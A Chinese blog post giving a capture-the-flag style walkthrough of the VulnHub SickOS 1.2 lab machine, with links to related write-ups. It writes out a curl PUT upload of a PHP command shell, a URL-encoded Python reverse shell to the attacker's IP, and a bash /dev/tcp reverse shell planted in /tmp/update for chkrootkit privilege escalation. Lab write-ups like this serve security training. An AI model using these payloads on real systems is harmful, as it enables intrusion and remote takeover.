OSCP - SickOS:1.2 writeup

最新推荐文章于 2024-12-13 17:28:34 发布

一支神经病

最新推荐文章于 2024-12-13 17:28:34 发布

阅读量487

点赞数

CC 4.0 BY-SA版权

文章标签： vulhub

本文链接：https://blog.youkuaiyun.com/Jiajiajiang_/article/details/105635131

本文详细介绍了一次针对SickOS虚拟机的渗透测试过程，包括利用PUT上传方法上传木马，通过weevely和curl命令进行连接，利用nmap扫描开放端口，最终通过chkrootkit实现提权，获取root权限。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

主机来源：www.vulnhub.com

下载地址：https://download.vulnhub.com/sickos/sick0s1.2.zip

用到的知识点：

PUT上传

chkrootkit提权

发现IP

安装成功后，查找此虚拟机的IP，我使用的是netdiscover

IP为10.0.3.144

nmap

没啥开的端口，从80开始，扫下目录，发现test目录，然后发现有PUT方法

上传

利用weevely来生成一个木马文件，weevely是kali中的PHP菜刀

连接

或者直接用curl命令来上传一个小马

curl -v -X PUT -d '<?php system($_GET["c"]); ?>' http://10.0.3.144/test/22.php

客户端监听，nc -nlvp 443

curl或者浏览器中访问

http://10.0.3.144/test/22.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%2210.0.3.141%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27

获得shell

提权

利用chkrootkit提权

写入文件

 printf '#!/bin/bash\nbash -i >& /dev/tcp/10.0.3.141/443 0>&1\n' >> /tmp/update

等待，获得root

为什么用443，是因为一般防火墙策略会只开很少的端口

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

一支神经病

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

靶机渗透（九）SickOs1.2

qq_42180996的博客

05-07

2726

靶机SickOs1.2 一、实验环境二、实验步骤（一）信息收集 1.查看测试机的IP信息，判断所处网段 2.主机发现（netdiscover） 3.端口扫描（masscan/nmap） 4.网站指纹信息扫描（whatweb）（二）Web渗透 1.浏览web网页（80端口） 2.远程登录（22端口） 3.目录扫描（dirb）（三）获取shell 1.方法一：P...

VulnHub之sickOs1.2 writeup

公众号shadow sock7

07-18

1883

vulhub box下载 https://www.vulnhub.com/entry/sickos-12,144/#vm https://download.vulnhub.com/sickos/sick0s1.2.zip 步骤探测IP和服务先用nmap探测IP和服务，发现只开了22和80，然后HTTP服务是lighttpd/1.4.28。 nikto扫然后用nikt...

参与评论您还未登录，请先登录后发表或查看评论

SICKOS: 1.2

MD@@nr丫卡uer

12-18

416

#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口，从web入手。 #3寻找入口查看源代码，没东⻄。扫描一下目录访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的，没有发现能利用的使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法，有个pu

Vulnhub-SickOs:1.2

cr7lyl的博客

09-11

1054

记一次Vulnhub-SickOs1.2渗透过程

VulnHub-Sick0s1.2

热门推荐

江左盟的博客

08-29

1万+

目录简介信息收集漏洞发现漏洞利用权限提升总结简介该靶机是Sick0s系列的第二个靶机，总体来说不难，提权那里需要花点时间，毕竟linpeas脚本没有将计划任务标红，总之我个人尝试了很久内核提权，浪费了大量时间，而且不知道是web服务太不稳定还是我用的ESXI太旧了，web服务挂掉的次数太多了。通过PUT方法在test目录下写入webshell获取服务器权限，然后利用chkrootkit 0.49本地提权漏洞提升至root权限。信息收集 ...

OSCP-Resources:有助于准备OSCP考试的资源集合

03-07

OSCP资源有助于准备OSCP考试的资源的集合。虚拟机/实验室环境有大量的在线实验室环境可帮助您及时了解漏洞（新旧漏洞）。 HackTheBox -在线实验室环境- VulnHub -弱势虚拟机- TryHackMe -在线实验室环境- ...

OSCP-MarkdownReportingTemplates:Markdown报告模板和Pandoc样式参考可轻松生成OSCPPWK的时尚报告

05-15

OSCP / PWK降价报告模板和Pandoc参考样式我写有关如何使用这些模板轻松生成漂亮报告。此存储库包含我用于OSCP / PWK实验室和考试报告的模板，以及用于将降价报告转换为（相对）外观优美且井井有条的报告的基本...

java红酒网站源码-OSCP-Survival:OSCP-生存

06-05

java网站源码OSCP-生存这是一个克隆这也可以查看 OSCP-生存指南注意：本文档将目标 ip 称为导出变量 $ip。要在命令行上设置此值，请使用以下语法：出口ip=192.168.1.100 目录卡利Linux 将目标 IP 地址设置为$...

谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备

06-30

谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat：整个课程中最重要的工具。了解它的作用、您有哪些选项、反向 ...

OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练

05-04

触发BoF（这对OSCP有利，因为它们为您提供了代码段）查找EIP偏移确认偏移找到坏蛋确认错误字符+查找JMP ESP指令确认代码执行（pop calc）利用主机它基于“”项目（顺便说一句，对此进行了令人敬畏的解释）...

SickOs: 1.2渗透测试

最新发布

sucker的博客

12-13

944

它的全称是LightweightHTTPServer，是最早的轻量级Web服务器之一，在性能方面相对较优，比较适合在高负载的环境下运行，能够支持并发地处理大量的连接请求，占用的内存和系统资源较少，适用于资源有限的服务器上运行。还可以通过扩展模块的方式扩展功能，例如支持PHP、Perl等脚本语言的功能，也能支持SSL/TLS加密等功能，并且支持虚拟主机的功能，可以在一台服务器上运行多个网站，并且隔离不同的网站环境。，开始漏洞利用，向update文件中写入将www-date添加到sudo组的命令，并且给。

Vulnhub靶机：SickOs1.2

qq_48904485的博客

03-21

1062

运行环境：Virtualbox攻击机：kali（10.0.2.4）靶机：SickOs 1.2（10.0.2.15）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/sickos-12,144/

SICKOS 1.2 WALKTHROUGH

weixin_41082546的博客

08-11

431

SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 首先获取目标ip地址，并探测端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web，并查看源码，没有什么有用的东西目录发现 dirbhttp://192.168.88.201 nikto -hhtt...

靶机渗透SickOs1.2（非常详细，适合新手渗透）

君莫hacker的博客

09-08

7523

靶机HACKME:2的目录0x01靶机描述 0x01靶机描述靶机基本信息：链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日难度中等靶机基本介绍：这是SickOs后续系列中的第二个，独立于以前的版本，挑战的范围是在系统上获得最高权限。 ...

OSCP - SickOS:1.1 writeup

Jiajiajiang_的博客

04-15

806

主机来源：www.vulnhub.com 下载地址：https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后，查找此虚拟机的IP，我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫想了一下突破口肯定不是ssh，就从3128端口入手把...

渗透测试靶机----sickos1.2

久恙502的博客

01-25

626

渗透测试，打靶经历记录，大佬多多指点，谢谢！！

(Vulnhub练习)---SICKOS: 1.2渗透实战

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

05-03

2100

文章目录(Vulnhub练习)-- SICKOS: 1.2渗透实战下载地址主机发现目标ip192.168.100.159信息收集nmap端口扫描指纹识别路径扫描漏洞挖掘PUT方法任意写文件漏洞使用nmap脚本进行扫描漏洞利用php一句话木马 + 蚁剑连接nc反弹shellmsf反弹shellmsf改为php反弹shell本地提权查看靶机的版本及内核信息查看/etc/cron*下所含的所有文件查看chkrootkit的版本搜索chkrootkit 0.49版本漏洞查看提权步骤提权步骤：将当前用户（www-da

VulnHub-sick0s1.2-靶机渗透学习

嗯嗯呐的博客

12-08

1078

靶机地址：https://www.vulnhub.com/entry/sickos-12,144/ 靶机难度：中级（CTF）靶机描述：这是SickOs的后续系列中的第二篇，并且与先前的发行版无关，挑战范围是在系统上获得最高特权。目标：得到root权限&找到flag.txt 作者：嗯嗯呐目录信息收集getshellPHP一句话木马获得shell利用MSF获得shell提权手工提权MSF提权总结信息收集 nmap扫描确定靶机地址 nmap扫描端口 -sS 半端口扫描 -sV 扫描出对应程序的版

vulnhub-sick0s1.2简单靶场提权

shulao2010的博客

05-29

356

简单靶场提权，以及通过一个例子，看安全软件是否真正安全